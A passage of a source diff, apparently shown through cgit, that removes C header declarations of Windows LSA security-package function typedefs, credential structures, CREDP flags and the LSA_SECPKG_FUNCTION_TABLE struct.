-typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGEEX) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
-typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE_PASSTHROUGH) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
-typedef BOOLEAN (WINAPI * PLSA_GET_CALL_INFO) (OUT PSECPKG_CALL_INFO Info);
-typedef PVOID (WINAPI * PLSA_CREATE_SHARED_MEMORY) (ULONG MaxSize, ULONG InitialSize);
-typedef PVOID (WINAPI * PLSA_ALLOCATE_SHARED_MEMORY) (PVOID SharedMem, ULONG Size);
-typedef VOID (WINAPI * PLSA_FREE_SHARED_MEMORY) (PVOID SharedMem, PVOID Memory);
-typedef BOOLEAN (WINAPI * PLSA_DELETE_SHARED_MEMORY) (PVOID SharedMem);
-typedef NTSTATUS (WINAPI * PLSA_OPEN_SAM_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, BOOLEAN AllowGuest, ULONG Reserved, PVOID * UserHandle);
-typedef NTSTATUS (WINAPI * PLSA_GET_USER_CREDENTIALS) (PVOID UserHandle, PVOID * PrimaryCreds, PULONG PrimaryCredsSize, PVOID * SupplementalCreds, PULONG SupplementalCredsSize);
-typedef NTSTATUS (WINAPI * PLSA_GET_USER_AUTH_DATA) (PVOID UserHandle, PUCHAR * UserAuthData, PULONG UserAuthDataSize);
-typedef NTSTATUS (WINAPI * PLSA_CLOSE_SAM_USER) (PVOID UserHandle);
-typedef NTSTATUS (WINAPI * PLSA_GET_AUTH_DATA_FOR_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, PUCHAR * UserAuthData, PULONG UserAuthDataSize, PUNICODE_STRING UserFlatName);
-typedef NTSTATUS (WINAPI * PLSA_CONVERT_AUTH_DATA_TO_TOKEN) (IN PVOID UserAuthData, IN ULONG UserAuthDataSize, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN PUNICODE_STRING AuthorityName, OUT PHANDLE Token, OUT PLUID LogonId, OUT PUNICODE_STRING AccountName, OUT PNTSTATUS SubStatus);
-typedef NTSTATUS (WINAPI * PLSA_CRACK_SINGLE_NAME) (IN ULONG FormatOffered, IN BOOLEAN PerformAtGC, IN PUNICODE_STRING NameInput, IN PUNICODE_STRING Prefix OPTIONAL, IN ULONG RequestedFormat, OUT PUNICODE_STRING CrackedName, OUT PUNICODE_STRING DnsDomainName, OUT PULONG SubStatus);
-typedef NTSTATUS (WINAPI * PLSA_AUDIT_ACCOUNT_LOGON) (IN ULONG AuditId, IN BOOLEAN Success, IN PUNICODE_STRING Source, IN PUNICODE_STRING ClientName, IN PUNICODE_STRING MappedName, IN NTSTATUS Status);
-typedef NTSTATUS (WINAPI * PLSA_CLIENT_CALLBACK) (IN PCHAR Callback, IN ULONG_PTR Argument1, IN ULONG_PTR Argument2, IN PSecBuffer Input, OUT PSecBuffer Output);
-typedef NTSTATUS (WINAPI * PLSA_REGISTER_CALLBACK) (ULONG CallbackId, PLSA_CALLBACK_FUNCTION Callback);
-typedef NTSTATUS (WINAPI * PLSA_UPDATE_PRIMARY_CREDENTIALS) (IN PSECPKG_PRIMARY_CRED PrimaryCredentials, IN OPTIONAL PSECPKG_SUPPLEMENTAL_CRED_ARRAY Credentials);
-typedef VOID (WINAPI * PLSA_PROTECT_MEMORY) (IN PVOID Buffer, IN ULONG BufferSize);
-typedef NTSTATUS (WINAPI * PLSA_OPEN_TOKEN_BY_LOGON_ID) (IN PLUID LogonId, OUT HANDLE *RetTokenHandle);
-typedef NTSTATUS (WINAPI * PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN) (IN PUCHAR UserAuthData, IN ULONG UserAuthDataSize, IN PVOID Reserved, OUT PUCHAR * ExpandedAuthData, OUT PULONG ExpandedAuthDataSize);
-
-
-
-#ifndef _ENCRYPTED_CREDENTIAL_DEFINED
-#define _ENCRYPTED_CREDENTIAL_DEFINED
-
-typedef struct _ENCRYPTED_CREDENTIALW {
- CREDENTIALW Cred;
- ULONG ClearCredentialBlobSize;
-} ENCRYPTED_CREDENTIALW, *PENCRYPTED_CREDENTIALW;
-#endif // _ENCRYPTED_CREDENTIAL_DEFINED
-
-#define CREDP_FLAGS_IN_PROCESS 0x01 // Caller is in-process. Password data may be returned
-#define CREDP_FLAGS_USE_MIDL_HEAP 0x02 // Allocated buffer should use MIDL_user_allocte
-#define CREDP_FLAGS_DONT_CACHE_TI 0x04 // TargetInformation shouldn't be cached for CredGetTargetInfo
-#define CREDP_FLAGS_CLEAR_PASSWORD 0x08 // Credential blob is passed in in-the-clear
-#define CREDP_FLAGS_USER_ENCRYPTED_PASSWORD 0x10 // Credential blob is passed protected by RtlEncryptMemory
-#define CREDP_FLAGS_TRUSTED_CALLER 0x20 // Caller is a trusted process (eg. logon process).
-
-typedef enum _CredParsedUserNameType
-{
- parsedUsernameInvalid = 0,
- parsedUsernameUpn,
- parsedUsernameNt4Style,
- parsedUsernameCertificate,
- parsedUsernameNonQualified
-} CredParsedUserNameType;
-
-
-typedef NTSTATUS (NTAPI CredReadFn) (IN PLUID LogonId, IN ULONG CredFlags, IN LPWSTR TargetName, IN ULONG Type, IN ULONG Flags, OUT PENCRYPTED_CREDENTIALW *Credential);
-typedef NTSTATUS (NTAPI CredReadDomainCredentialsFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PCREDENTIAL_TARGET_INFORMATIONW TargetInfo, IN ULONG Flags, OUT PULONG Count, OUT PENCRYPTED_CREDENTIALW **Credential);
-
-typedef VOID (NTAPI CredFreeCredentialsFn) (IN ULONG Count, IN PENCRYPTED_CREDENTIALW *Credentials OPTIONAL);
-typedef NTSTATUS (NTAPI CredWriteFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PENCRYPTED_CREDENTIALW Credential, IN ULONG Flags);
-typedef NTSTATUS (NTAPI CrediUnmarshalandDecodeStringFn)(IN LPWSTR MarshaledString, OUT LPBYTE *Blob, OUT ULONG *BlobSize, OUT BOOLEAN *IsFailureFatal);
-
-typedef struct _LSA_SECPKG_FUNCTION_TABLE {
- PLSA_CREATE_LOGON_SESSION CreateLogonSession;
- PLSA_DELETE_LOGON_SESSION DeleteLogonSession;
- PLSA_ADD_CREDENTIAL AddCredential;
- PLSA_GET_CREDENTIALS GetCredentials;
- PLSA_DELETE_CREDENTIAL DeleteCredential;
- PLSA_ALLOCATE_LSA_HEAP AllocateLsaHeap;
- PLSA_FREE_LSA_HEAP FreeLsaHeap;
- PLSA_ALLOCATE_CLIENT_BUFFER AllocateClientBuffer;
- PLSA_FREE_CLIENT_BUFFER FreeClientBuffer;
- PLSA_COPY_TO_CLIENT_BUFFER CopyToClientBuffer;
- PLSA_COPY_FROM_CLIENT_BUFFER CopyFromClientBuffer;
- PLSA_IMPERSONATE_CLIENT ImpersonateClient;
- PLSA_UNLOAD_PACKAGE UnloadPackage;
- PLSA_DUPLICATE_HANDLE DuplicateHandle;
- PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS SaveSupplementalCredentials;
- PLSA_CREATE_THREAD CreateThread;
- PLSA_GET_CLIENT_INFO GetClientInfo;
- PLSA_REGISTER_NOTIFICATION RegisterNotification;
- PLSA_CANCEL_NOTIFICATION CancelNotification;
- PLSA_MAP_BUFFER MapBuffer;
- PLSA_CREATE_TOKEN CreateToken;
- PLSA_AUDIT_LOGON AuditLogon;
- PLSA_CALL_PACKAGE CallPackage;
- PLSA_FREE_LSA_HEAP FreeReturnBuffer;
- PLSA_GET_CALL_INFO GetCallInfo;
- PLSA_CALL_PACKAGEEX CallPackageEx;
- PLSA_CREATE_SHARED_MEMORY CreateSharedMemory;
- PLSA_ALLOCATE_SHARED_MEMORY AllocateSharedMemory;
- PLSA_FREE_SHARED_MEMORY FreeSharedMemory;
- PLSA_DELETE_SHARED_MEMORY DeleteSharedMemory;
- PLSA_OPEN_SAM_USER OpenSamUser;
- PLSA_GET_USER_CREDENTIALS GetUserCredentials;
- PLSA_GET_USER_AUTH_DATA GetUserAuthData;
- PLSA_CLOSE_SAM_USER CloseSamUser;
- PLSA_CONVERT_AUTH_DATA_TO_TOKEN ConvertAuthDataToToken;
- PLSA_CLIENT_CALLBACK ClientCallback;
- PLSA_UPDATE_PRIMARY_CREDENTIALS UpdateCredentials;
- PLSA_GET_AUTH_DATA_FOR_USER GetAuthDataForUser;
- PLSA_CRACK_SINGLE_NAME CrackSingleName;
- PLSA_AUDIT_ACCOUNT_LOGON AuditAccountLogon;
- PLSA_CALL_PACKAGE_PASSTHROUGH CallPackagePassthrough;
- CredReadFn *CrediRead;
- CredReadDomainCredentialsFn *CrediReadDomainCredentials;
- CredFreeCredentialsFn *CrediFreeCredentials;
- PLSA_PROTECT_MEMORY LsaProtectMemory;
- PLSA_PROTECT_MEMORY LsaUnprotectMemory;
- PLSA_OPEN_TOKEN_BY_LOGON_ID OpenTokenByLogonId;
- PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN ExpandAuthDataForDomain;
- PLSA_ALLOCATE_PRIVATE_HEAP AllocatePrivateHeap;
- PLSA_FREE_PRIVATE_HEAP FreePrivateHeap;
- PLSA_CREATE_TOKEN_EX CreateTokenEx;
- CredWriteFn *CrediWrite;
- CrediUnmarshalandDecodeStringFn *CrediUnmarshalandDecodeString;
-} LSA_SECPKG_FUNCTION_TABLE, *PLSA_SECPKG_FUNCTION_TABLE;
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-26 03:23:50 +0000